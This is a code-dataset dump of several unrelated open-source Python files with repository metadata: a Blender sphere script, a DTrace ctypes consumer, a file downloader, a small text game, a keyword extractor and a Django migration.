                'z': i.pose.orientation.z
            }
            node['node']['edges'] = []
            for j in i.edges:
                dd = {}
                dd['action'] = j.action
                dd['edge_id'] = j.edge_id
                dd['node'] = j.node
                node['node']['edges'].append(dd)
            node['node']['verts'] = []
            for h in i.verts:
                vv = {'x': h.x, 'y': h.y}
                node['node']['verts'].append(vv)
            s.append(node)
        return s
| 28.491803 | 51 | 0.439586 | 189 | 1,738 | 3.957672 | 0.285714 | 0.139037 | 0.064171 | 0.042781 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.406214 | 1,738 | 60 | 52 | 28.966667 | 0.724806 | 0 | 0 | 0 | 0 | 0 | 0.082854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.039216 | null | null | 0.019608 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
956eeea77e797894ec059a63de8948b819247bfc | 802 | py | Python | experimental/blender/spheres.py | mcarlen/libbiarc | d016a1be643ddcded53411b4f242ac6004b65173 | [
"Apache-2.0"
] | null | null | null | experimental/blender/spheres.py | mcarlen/libbiarc | d016a1be643ddcded53411b4f242ac6004b65173 | [
"Apache-2.0"
] | 1 | 2019-08-23T09:36:29.000Z | 2019-08-26T09:56:38.000Z | experimental/blender/spheres.py | mcarlen/libbiarc | d016a1be643ddcded53411b4f242ac6004b65173 | [
"Apache-2.0"
] | 1 | 2019-08-11T21:12:02.000Z | 2019-08-11T21:12:02.000Z | """
Use this script to generate a *thick* wireframe with spheres
as joints. The input file (currently /tmp/wire.txt) is the
output file from the tool pkf2mesh!
Adjust SRadius for the cylinder size. The sphere size is
6*SRadius, change it as well if needed.
"""
from Blender import *
from Blender.Mathutils import Vector
from os import popen2, listdir
from math import sin,cos,pi, sqrt
from sys import exit
# Input produced by pkf2mesh: one "x y z" vertex per line.
filename="/home/carlen/work/libbiarc/tools/bill_vertices.txt"
res=3    # icosphere subdivision level
rad=0.1  # sphere radius
file = open(filename)  # NOTE(review): shadows the Python 2 builtin `file`
def doSphere(coords, subdiv=2,radius=1):
    # Create an icosphere mesh at `coords`, link it into the current
    # Blender scene and return the new object.
    me = Mesh.Primitives.Icosphere(subdiv, radius)
    ob = Scene.GetCurrent().objects.new(me,'Mesh')
    ob.loc = coords
    return ob
# One sphere per vertex line. NOTE(review): map() returns an iterator on
# Python 3 -- this relies on the Python 2 interpreter shipped with old
# Blender releases.
for l in file.readlines():
    doSphere(map(float,l.strip().split()), res, rad)
file.close()
Window.RedrawAll()
| 22.914286 | 62 | 0.73192 | 128 | 802 | 4.578125 | 0.710938 | 0.037543 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011817 | 0.15586 | 802 | 34 | 63 | 23.588235 | 0.853767 | 0.315461 | 0 | 0 | 1 | 0 | 0.101695 | 0.094162 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.277778 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
957835505fd0e4beac70b8de003dc1bdf38f88e9 | 9,825 | py | Python | dtrace_ctypes/consumer.py | arichardson/l41-python-dtrace | 19c601660499b3555e2ea800392da5e6fed6b04e | [
"MIT"
] | 1 | 2021-01-07T18:31:16.000Z | 2021-01-07T18:31:16.000Z | dtrace_ctypes/consumer.py | arichardson/l41-python-dtrace | 19c601660499b3555e2ea800392da5e6fed6b04e | [
"MIT"
] | null | null | null | dtrace_ctypes/consumer.py | arichardson/l41-python-dtrace | 19c601660499b3555e2ea800392da5e6fed6b04e | [
"MIT"
] | null | null | null | """
The implementation of the consumer.
Created on Oct 10, 2011
@author: tmetsch
"""
import ctypes
import threading
import time
from ctypes import (cdll, CDLL, byref, c_int, c_char_p, CFUNCTYPE, c_void_p,
                    POINTER, cast)
from threading import Thread

from dtrace_ctypes.dtrace_structs import (dtrace_bufdata, dtrace_probedata,
                                          dtrace_aggdata, dtrace_recdesc)
# Load the native libdtrace; every DTrace call below goes through this handle.
cdll.LoadLibrary("libdtrace.so")
LIBRARY = CDLL("libdtrace.so")

# Shortcut for acquiring a DTrace handle via dtrace_open().
dtrace_open = LIBRARY.dtrace_open

# =============================================================================
# chewing and output walkers
# =============================================================================

# ctypes signatures for the libdtrace consumer callbacks: each receives the
# native data structure plus an opaque user argument and returns an int status.
CHEW_FUNC = CFUNCTYPE(c_int,
                      POINTER(dtrace_probedata),
                      POINTER(c_void_p))

CHEWREC_FUNC = CFUNCTYPE(c_int,
                         POINTER(dtrace_probedata),
                         POINTER(dtrace_recdesc),
                         POINTER(c_void_p))

BUFFERED_FUNC = CFUNCTYPE(c_int,
                          POINTER(dtrace_bufdata),
                          POINTER(c_void_p))

WALK_FUNC = CFUNCTYPE(c_int,
                      POINTER(dtrace_aggdata),
                      POINTER(c_void_p))
def simple_chew_func(data, arg):
    """Default chew callback: report the CPU that produced the probe data."""
    cpu = c_int(data.contents.dtpda_cpu).value
    print('CPU :', cpu)
    return 0
def simple_chewrec_func(data, rec, arg):
    """Default record-chew callback: stop (1) when the record is missing,
    otherwise continue (0)."""
    return 1 if rec is None else 0
def simple_buffered_out_writer(bufdata, arg):
    """
    In case dtrace_work is given None as filename - this one is called.
    Prints the stripped buffered output and continues (0).
    """
    buffered = c_char_p(bufdata.contents.dtbda_buffered).value
    print('out >', buffered.strip())
    return 0
def simple_walk(data, arg):
    """
    Aggregate walker capable of reading a name and one value.
    """
    # TODO: pickup the 16 and 272 from offset in desc...
    tmp = data.contents.dtada_data
    name = cast(tmp + 16, c_char_p).value
    instance = deref(tmp + 272, c_int).value
    # Single-argument print() works on Python 2 and 3 alike; the original
    # Python 2 print statement is a SyntaxError on Python 3.
    print('{0:60s} :{1:10d}'.format(name, instance))
    return 0
# =============================================================================
# Convenience stuff
# =============================================================================
def deref(addr, typ):
    """Dereference `addr` as a pointer to ctypes type `typ` and return the
    pointed-to object."""
    pointer = cast(addr, POINTER(typ))
    return pointer.contents
def get_error_msg(handle):
    """
    Get the latest and greatest DTrace error.
    """
    errno = LIBRARY.dtrace_errno(handle)
    message = LIBRARY.dtrace_errmsg(handle, errno)
    return c_char_p(message).value
# =============================================================================
# Consumers
# =============================================================================
class DTraceConsumer(object):
    """
    A Python based DTrace consumer.

    Wraps a native libdtrace handle; callbacks for probe chewing, record
    chewing, buffered stdout and aggregate walking may be supplied, with
    the simple_* functions from this module as defaults.
    """

    def __init__(self,
                 chew_func=None,
                 chew_rec_func=None,
                 walk_func=None,
                 out_func=None):
        """
        Constructor. Acquires the DTrace handle.

        chew_func     -- per-probe callback (default: simple_chew_func).
        chew_rec_func -- per-record callback (default: simple_chewrec_func).
        walk_func     -- aggregate walker (default: simple_walk).
        out_func      -- buffered output writer (default:
                         simple_buffered_out_writer).

        Raises Exception when no handle can be acquired or buffer options
        cannot be set.
        """
        if chew_func is not None:
            self.chew = CHEW_FUNC(chew_func)
        else:
            self.chew = CHEW_FUNC(simple_chew_func)
        if chew_rec_func is not None:
            self.chew_rec = CHEWREC_FUNC(chew_rec_func)
        else:
            self.chew_rec = CHEWREC_FUNC(simple_chewrec_func)
        if walk_func is not None:
            self.walk = WALK_FUNC(walk_func)
        else:
            self.walk = WALK_FUNC(simple_walk)
        if out_func is not None:
            self.buf_out = BUFFERED_FUNC(out_func)
        else:
            self.buf_out = BUFFERED_FUNC(simple_buffered_out_writer)
        # get dtrace handle
        err = c_int(0)
        self.handle = dtrace_open(3, 0, byref(err))
        if self.handle is None:
            raise Exception('Unable to get a DTrace handle.')
        # set buffer options
        if LIBRARY.dtrace_setopt(self.handle, 'bufsize', '4m') != 0:
            raise Exception(get_error_msg(self.handle))
        if LIBRARY.dtrace_setopt(self.handle, 'aggsize', '4m') != 0:
            raise Exception(get_error_msg(self.handle))

    def __del__(self):
        """
        Always close the DTrace handle :-)
        """
        LIBRARY.dtrace_close(self.handle)

    def run(self, script, runtime=1):
        """
        Run a DTrace script for a number of seconds defined by the runtime.

        After the run is complete the aggregate is walked. During execution the
        stdout of DTrace is redirected to the chew, chewrec and buffered output
        writer.

        script -- The script to run.
        runtime -- The time the script should run in second (Default: 1s).
        """
        # set simple output callbacks
        if LIBRARY.dtrace_handle_buffered(self.handle, self.buf_out,
                                          None) == -1:
            raise Exception('Unable to set the stdout buffered writer.')
        # compile the D script into a program
        prg = LIBRARY.dtrace_program_strcompile(self.handle,
                                                script, 3, 4, 0, None)
        if prg is None:
            raise Exception('Unable to compile the script: ',
                            get_error_msg(self.handle))
        # execute the program and enable tracing
        if LIBRARY.dtrace_program_exec(self.handle, prg, None) == -1:
            raise Exception('Failed to execute: ',
                            get_error_msg(self.handle))
        if LIBRARY.dtrace_go(self.handle) != 0:
            raise Exception('Failed to run_script: ',
                            get_error_msg(self.handle))
        # aggregate data for `runtime` seconds, one dtrace_work pass per second
        i = 0
        while i < runtime:
            LIBRARY.dtrace_sleep(self.handle)
            LIBRARY.dtrace_work(self.handle, None, self.chew, self.chew_rec,
                                None)
            # requires the module-level `import time`
            time.sleep(1)
            i += 1
        LIBRARY.dtrace_stop(self.handle)
        # walk value-sorted instead of plain dtrace_aggregate_walk
        if LIBRARY.dtrace_aggregate_walk_valsorted(self.handle,
                                                   self.walk,
                                                   None) != 0:
            raise Exception('Failed to walk the aggregate: ',
                            get_error_msg(self.handle))
class DTraceConsumerThread(Thread):
    """
    DTrace consumer running in its own thread.

    The thread consumes and aggregates data until stop() is called; the run
    loop checks the stopped() condition regularly.
    """

    def __init__(self,
                 script,
                 chew_func=None,
                 chew_rec_func=None,
                 walk_func=None,
                 out_func=None):
        """
        Constructor. Acquires the DTrace handle.

        script        -- the D script to run.
        chew_func     -- per-probe callback (default: simple_chew_func).
        chew_rec_func -- per-record callback (default: simple_chewrec_func).
        walk_func     -- aggregate walker (default: simple_walk).
        out_func      -- buffered output writer (default:
                         simple_buffered_out_writer).
        """
        super(DTraceConsumerThread, self).__init__()
        # Stored as _stop_event: the previous attribute name `_stop`
        # clobbered threading.Thread._stop and broke Thread internals on
        # Python 3.
        self._stop_event = threading.Event()
        self.script = script
        if chew_func is not None:
            self.chew = CHEW_FUNC(chew_func)
        else:
            self.chew = CHEW_FUNC(simple_chew_func)
        if chew_rec_func is not None:
            self.chew_rec = CHEWREC_FUNC(chew_rec_func)
        else:
            self.chew_rec = CHEWREC_FUNC(simple_chewrec_func)
        if walk_func is not None:
            self.walk = WALK_FUNC(walk_func)
        else:
            self.walk = WALK_FUNC(simple_walk)
        if out_func is not None:
            self.buf_out = BUFFERED_FUNC(out_func)
        else:
            self.buf_out = BUFFERED_FUNC(simple_buffered_out_writer)
        # get dtrace handle
        self.handle = LIBRARY.dtrace_open(3, 0, byref(c_int(0)))
        if self.handle is None:
            raise Exception('Unable to get a DTrace handle.')
        # set buffer options
        if LIBRARY.dtrace_setopt(self.handle, 'bufsize', '4m') != 0:
            raise Exception(get_error_msg(self.handle))
        if LIBRARY.dtrace_setopt(self.handle, 'aggsize', '4m') != 0:
            raise Exception(get_error_msg(self.handle))

    def run(self):
        """Compile and execute the script, then consume data until stopped."""
        Thread.run(self)
        # set simple output callbacks
        if LIBRARY.dtrace_handle_buffered(self.handle, self.buf_out,
                                          None) == -1:
            raise Exception('Unable to set the stdout buffered writer.')
        # compile the D script into a program
        prg = LIBRARY.dtrace_program_strcompile(self.handle,
                                                self.script, 3, 4, 0,
                                                None)
        if prg is None:
            raise Exception('Unable to compile the script: ',
                            get_error_msg(self.handle))
        # execute the program and enable tracing
        if LIBRARY.dtrace_program_exec(self.handle, prg, None) == -1:
            raise Exception('Failed to execute: ',
                            get_error_msg(self.handle))
        if LIBRARY.dtrace_go(self.handle) != 0:
            raise Exception('Failed to run_script: ',
                            get_error_msg(self.handle))
        # aggregate data until asked to stop...
        while not self.stopped():
            LIBRARY.dtrace_sleep(self.handle)
            LIBRARY.dtrace_work(self.handle, None, self.chew, self.chew_rec,
                                None)
            if LIBRARY.dtrace_aggregate_snap(self.handle) != 0:
                raise Exception('Failed to snapshot the aggregate: ',
                                get_error_msg(self.handle))
            if LIBRARY.dtrace_aggregate_walk(self.handle, self.walk,
                                             None) != 0:
                raise Exception('Failed to walk the aggregate: ',
                                get_error_msg(self.handle))
        LIBRARY.dtrace_stop(self.handle)

    def stop(self):
        """
        Signal the consumer loop to terminate.
        """
        self._stop_event.set()

    def stopped(self):
        """
        Used to check the status; True once stop() has been called.
        """
        return self._stop_event.is_set()
| 31.59164 | 79 | 0.533232 | 1,101 | 9,825 | 4.561308 | 0.175295 | 0.077658 | 0.030665 | 0.038829 | 0.591995 | 0.560932 | 0.548984 | 0.540024 | 0.514536 | 0.514536 | 0 | 0.009337 | 0.335064 | 9,825 | 310 | 80 | 31.693548 | 0.759375 | 0.084682 | 0 | 0.619883 | 0 | 0 | 0.059948 | 0 | 0 | 0 | 0 | 0.003226 | 0 | 0 | null | null | 0 | 0.02924 | null | null | 0.017544 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
957b97a6d1130326dc3c49e965bf67467c62ded0 | 1,388 | py | Python | opennem/core/downloader.py | paulculmsee/opennem | 9ebe4ab6d3b97bdeebc352e075bbd5c22a8ddea1 | [
"MIT"
] | null | null | null | opennem/core/downloader.py | paulculmsee/opennem | 9ebe4ab6d3b97bdeebc352e075bbd5c22a8ddea1 | [
"MIT"
] | null | null | null | opennem/core/downloader.py | paulculmsee/opennem | 9ebe4ab6d3b97bdeebc352e075bbd5c22a8ddea1 | [
"MIT"
] | null | null | null | import logging
from io import BytesIO
from zipfile import ZipFile
from opennem.utils.handlers import _handle_zip, chain_streams
from opennem.utils.http import http
from opennem.utils.mime import mime_from_content, mime_from_url
logger = logging.getLogger("opennem.downloader")
def url_downloader(url: str) -> bytes:
"""Downloads a URL and returns content, handling embedded zips and other MIME's"""
logger.debug("Downloading: {}".format(url))
r = http.get(url)
if not r.ok:
raise Exception("Bad link returned {}: {}".format(r.status_code, url))
content = BytesIO(r.content)
file_mime = mime_from_content(content)
if not file_mime:
file_mime = mime_from_url(url)
# @TODO handle all this in utils/archive.py
# and make it all generic to handle other
# mime types
if file_mime == "application/zip":
with ZipFile(content) as zf:
if len(zf.namelist()) == 1:
return zf.open(zf.namelist()[0]).read()
c = []
stream_count = 0
for filename in zf.namelist():
if filename.endswith(".zip"):
c.append(_handle_zip(zf.open(filename), "r"))
stream_count += 1
else:
c.append(zf.open(filename))
return chain_streams(c).read()
return content.getvalue()
| 27.76 | 86 | 0.618156 | 181 | 1,388 | 4.618785 | 0.436464 | 0.038278 | 0.057416 | 0.038278 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003976 | 0.275216 | 1,388 | 49 | 87 | 28.326531 | 0.827038 | 0.122478 | 0 | 0 | 0 | 0 | 0.063636 | 0 | 0 | 0 | 0 | 0.020408 | 0 | 1 | 0.033333 | false | 0 | 0.2 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
957bb967b951b6436250a6905e698953e9ec010b | 2,667 | py | Python | Item.py | Luigimonbymus/Modern-Quest | de75d38544b97482ef13cb972cc98af591dc72dc | [
"MIT"
] | 1 | 2019-05-15T08:47:39.000Z | 2019-05-15T08:47:39.000Z | Item.py | Luigimonbymus/Modern-Quest | de75d38544b97482ef13cb972cc98af591dc72dc | [
"MIT"
] | null | null | null | Item.py | Luigimonbymus/Modern-Quest | de75d38544b97482ef13cb972cc98af591dc72dc | [
"MIT"
] | null | null | null | class item():
def ___init___(self, name, desc, worth):
self.name=name
self.desc=desc
self.worth=worth
def _str_(self):
return "{}\n=====\n{}\nWorth: {}\n".format(self.name, self.desc, self.worth)
class money(item):
def __init__(self, csh):
self.csh = csh
super().__init__(name="Money",
desc="Dollar bills in cash.",
worth=self.csh)
class weapon(item):
def __init__(self, name, desc, worth, dmg):
self.dmg=dmg
super().__init__(name,desc,value)
def _str_(self):
return "{}\n=====\n{}\nWorth: {}\nDmg: {}".format(self.name, self.desc, self.worth, self.dm)
class Bat(weapon):
def __init__(self):
super().__init__(name="Bat",
desc="Just an ordinary baseball bat.",
worth=3,
dmg=5)
class Stick(weapon):
def __init__(self):
super().__init__(name="Stick",
desc="A weak yet seemingly unbreakable branch from a tree.",
worth=1,
dmg=2)
class Chainsaw(weapon):
def __init__(self):
super().__init__(name="Chainsaw",
desc="This is overkill.",
worth=20,
dmg=15)
class GlassShrd(weapon):
def __init__(self):
super().__init__(name="Glass Shard",
desc="Broken sharp glass. It's a miracle your hand is not bleeding.",
worth=0,
dmg=4)
class Clackers(weapon):
def __init__(self):
super().__init__(name="Clackers",
desc="Balls of steel.",
worth=5,
dmg=5)
class Yoyo(weapon):
def __init__(self):
super().__init__(name="Yoyo",
desc="String plus plastic equals trick shots!",
worth=3,
dmg=5)
class FirstAid(item):
def __init__(self):
super().__init__(name="First-Aid",
desc="Heals your wounds.",
worth=3)
self.heal=10
def healing(self,HP):
#Heals player
class SuperFA(FirstAid):
def __init__(self):
super().__init__(name="Super First-Aid",
desc="A clinic in a box.",
worth=5,
heal=20)
class HyperFA
def __init__(self):
super().__init__(name="Hyper First-Aid",
desc="Surgeon approved.",
worth=10,
heal=30)
| 32.13253 | 100 | 0.478815 | 284 | 2,667 | 4.151408 | 0.323944 | 0.071247 | 0.111959 | 0.122137 | 0.379983 | 0.354538 | 0.293469 | 0 | 0 | 0 | 0 | 0.014879 | 0.395201 | 2,667 | 82 | 101 | 32.52439 | 0.716057 | 0.004499 | 0 | 0.243243 | 0 | 0 | 0.16202 | 0.015825 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95807b1417fb27c5aa763354d0af86eaaf9c1dce | 317 | py | Python | python/py-entrypoints/files/setup.py | svalgaard/macports-ports | b6fce80c90963dac7f3412e9faab3608c29b1dbd | [
"BSD-3-Clause"
] | 1 | 2018-10-10T09:13:56.000Z | 2018-10-10T09:13:56.000Z | python/py-entrypoints/files/setup.py | svalgaard/macports-ports | b6fce80c90963dac7f3412e9faab3608c29b1dbd | [
"BSD-3-Clause"
] | null | null | null | python/py-entrypoints/files/setup.py | svalgaard/macports-ports | b6fce80c90963dac7f3412e9faab3608c29b1dbd | [
"BSD-3-Clause"
] | null | null | null | from distutils.core import setup
setup(
name='entrypoints',
version='0.2.2',
description='Discover and load entry points from installed packages.',
author='Thomas Kluyver',
author_email='thomas@kluyver.me.uk',
url='https://github.com/takluyver/entrypoints',
py_modules=['entrypoints'],
)
| 26.416667 | 74 | 0.700315 | 39 | 317 | 5.641026 | 0.794872 | 0.118182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011236 | 0.157729 | 317 | 11 | 75 | 28.818182 | 0.812734 | 0 | 0 | 0 | 0 | 0 | 0.492114 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.1 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9582e33c487932c08833d1d3b0720ebec9ba2f4f | 4,706 | py | Python | Jarvis/BadDataDetector/get_keywords.py | rafarrel/Jarvis | 0a229ea196db8642537efa2b290fb6f22f4254c4 | [
"MIT"
] | null | null | null | Jarvis/BadDataDetector/get_keywords.py | rafarrel/Jarvis | 0a229ea196db8642537efa2b290fb6f22f4254c4 | [
"MIT"
] | 1 | 2021-11-09T19:27:13.000Z | 2021-11-09T19:27:13.000Z | Jarvis/BadDataDetector/get_keywords.py | rafarrel/Jarvis | 0a229ea196db8642537efa2b290fb6f22f4254c4 | [
"MIT"
] | null | null | null | """
This file was used to generate the keywords used in the bad data detector.
We manually edited/cleaned the generated keywords after to better reflect the
data and remove fringe/minimally related keywords that don't convey any
meaning.
DO NOT RUN THIS FILE as it will overwrite our cleaned keywords.
"""
##############################
# IMPORTS #
##############################
import os
import re
import json
from string import punctuation
from collections import Counter
import nltk
from nltk.corpus import stopwords
##############################
# FUNCTIONS #
##############################
def clean_data(data):
"""Pre-process data to remove things that don't convey mearning."""
# Stuff to remove
exclude = set(punctuation)
stop_words = stopwords.words('english')
# Remove stop words
text_tokenize = data['TXT'].lower().split(' ')
removed_stop = [token for token in text_tokenize if not token in stop_words]
removed_stop = " ".join(removed_stop)
# Remove punctuation
removed_punc = [char for char in removed_stop if char not in exclude]
data['TXT'] = "".join(removed_punc).rstrip(' ')
def load_data(directory_name):
"""Load data into a list of [txt, action] pairs from all files for
processing of keywords."""
# Initialize
data = []
# Loads contents of data files into a master dictionary with key:value pairs ACTION:TXT
training_files = os.listdir(os.path.join(os.getcwd(), directory_name))
for training_file in training_files:
filename = os.path.join(directory_name, training_file)
with open(filename, 'r') as file:
for line in file:
try:
# Convert each line to dict
line_dict = json.loads(line)
except:
# Separate only at commas that are followed by all caps
# text without a space (Action label is the all the caps thing)
txt_action_values = re.split(r',([A-Z]+)', line)
# Use try to skip over improperly formatted data
try:
# Convert each line to dict
line_dict = {'TXT':txt_action_values[0], 'ACTION':txt_action_values[1]}
except:
pass
finally:
# Clean data and append to list of lists
clean_data(line_dict)
data.append([line_dict['TXT'], line_dict['ACTION']])
# return a list of lists
return data
##############################
# MAIN CODE #
##############################
if __name__ == '__main__':
# UNCOMMENT THESE IF NEED TO DOWNLOAD
#nltk.download('punkt')
#nltk.download('stopwords')
# Load all data
data = load_data('OriginalTrainingData')
# Converts data to a list of lists where outer list is the actions
# and the inner list is all words for those actions
dat = []
actions = ['PIZZA', 'JOKE', 'WEATHER', 'GREET', 'TIME']
for action in actions:
txt_dat = []
for datapt in data:
if datapt[1] == action:
txt_dat = txt_dat + datapt[0].split(' ')
dat.append(txt_dat)
# Initialize counter objects for each action
counters = [Counter(),Counter(),Counter(),Counter(),Counter()]
# Update each counter with the data from dat
for i in range(5):
counters[i].update(dat[i])
# Initialize list for keywords for each action
keys = [[], [], [], [], []]
for i in range(5):
for word in counters[i].keys():
# Initialize array to be filled with boolean if
unique = []
for j in range(5):
# Test if word is at least 10x more prevalent for action i
# than any other action, if so append True to unique
if i != j and counters[j][word]*10 < counters[i][word]:
unique.append(True)
# Test if condition was true for all 4 other actions, if so
# qualifies as a keyword for action i
if sum(unique) == 4:
keys[i].append(word)
# Saves each keyword into a separate .txt file for later use
for i in range(5):
with open('KeywordData/keys_{}.txt'.format(actions[i].lower()), 'w') as file:
for word in keys[i]:
# Use try to skip over words with non-compatable characters
try:
file.write(word + '\n')
except:
pass | 36.48062 | 95 | 0.551849 | 576 | 4,706 | 4.430556 | 0.34375 | 0.015674 | 0.012539 | 0.012931 | 0.051724 | 0.025078 | 0.025078 | 0.025078 | 0 | 0 | 0 | 0.004416 | 0.326392 | 4,706 | 129 | 96 | 36.48062 | 0.800631 | 0.355504 | 0 | 0.174603 | 1 | 0 | 0.044302 | 0.008217 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031746 | false | 0.031746 | 0.111111 | 0 | 0.15873 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95930bf39240faf5c32905a77cd64dcc308bab13 | 2,002 | py | Python | main.py | ahsankhatri/cows-and-bulls | 8bff56cd112d652b7da4d7479634110daf42d1c7 | [
"MIT"
] | null | null | null | main.py | ahsankhatri/cows-and-bulls | 8bff56cd112d652b7da4d7479634110daf42d1c7 | [
"MIT"
] | null | null | null | main.py | ahsankhatri/cows-and-bulls | 8bff56cd112d652b7da4d7479634110daf42d1c7 | [
"MIT"
] | null | null | null | import random
import time
def ask_input(text=""):
try:
enteredNumber = (input(("Enter a 3-digit number:" if text == "" else text) + "\n>>>> "))
startTime()
if len(str(abs(enteredNumber))) != 3:
raise ValueError
else:
return str(enteredNumber)
except ValueError as valueE:
return ask_input("You exactly need to provide 3-digit number:")
except Exception as error:
startTime()
return ask_input("You did not entered number, please enter a number:")
def findForMatch(answer, guessNumber):
cows = bulls = 0
i = 0
temp = list(guessNumber)
for x in list(answer):
if answer[i] == guessNumber[i]:
cows += 1
if x in temp:
temp.remove(x)
bulls += 1
i += 1
bulls -= cows
return [cows,bulls]
def startTime():
global startedTime
if startedTime == 0:
startedTime = time.time()
print "\nWelcome to cows and bulls game!\n"
print "We have a number and you need to guess it, we'll try to give some hints. You need to find out the actual number."
print "TIP: Number does not start with zero\n"
answer = str(random.randint(100, 999))
guessNumber = 0
attempts = 0
startedTime = 0
# print answer # Print answer (for debugging purpose)
while answer != guessNumber:
# print guessNumber # for debugging purpose
guessNumber = ask_input("" if guessNumber == 0 else " ")
[cows, bulls] = findForMatch(answer, guessNumber)
attempts += 1
if cows != 3:
print "You got", cows, "cows and", bulls, "bulls. Try again."
diff = int(time.time() - startedTime)
minutes, seconds = diff // 60, diff % 60
print "\nCongrats! You got all the cows correct in", attempts, "attempts and you took " + str(minutes).zfill(2) + ':' + str(seconds).zfill(2), 'seconds'
# Save user data for future statistics
with open('history.txt', 'a') as historyFile:
historyFile.write(answer+'|'+str(attempts)+'|'+str(diff)+"\n")
| 28.6 | 152 | 0.626374 | 268 | 2,002 | 4.664179 | 0.391791 | 0.0256 | 0.0192 | 0.0272 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018036 | 0.252248 | 2,002 | 69 | 153 | 29.014493 | 0.816967 | 0.063936 | 0 | 0.04 | 0 | 0.02 | 0.230193 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.04 | null | null | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9597928473fbb393149208377f08ae5bac78fb1e | 1,083 | py | Python | correctiv_eurosfueraerzte/migrations/0022_auto_20170323_1642.py | correctiv/correctiv-eurosfueraerzte | 291c358d65eccf06034e409d888de56a4545c7b7 | [
"MIT"
] | 4 | 2016-09-24T07:27:49.000Z | 2021-11-08T12:14:30.000Z | correctiv_eurosfueraerzte/migrations/0022_auto_20170323_1642.py | correctiv/correctiv-eurosfueraerzte | 291c358d65eccf06034e409d888de56a4545c7b7 | [
"MIT"
] | 5 | 2020-06-05T17:33:30.000Z | 2022-03-11T23:16:18.000Z | correctiv_eurosfueraerzte/migrations/0022_auto_20170323_1642.py | correctiv/correctiv-eurosfueraerzte | 291c358d65eccf06034e409d888de56a4545c7b7 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-23 15:42
from __future__ import unicode_literals
import django.contrib.postgres.fields.hstore
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('correctiv_eurosfueraerzte', '0021_paymentrecipient_aggs'),
]
operations = [
migrations.AddField(
model_name='zerodoctor',
name='address_type',
field=models.CharField(blank=True, max_length=50),
),
migrations.AddField(
model_name='zerodoctor',
name='specialisation',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='zerodoctor',
name='web',
field=models.URLField(blank=True, max_length=1024),
),
migrations.AlterField(
model_name='paymentrecipient',
name='data',
field=django.contrib.postgres.fields.hstore.HStoreField(blank=True, default=dict),
),
]
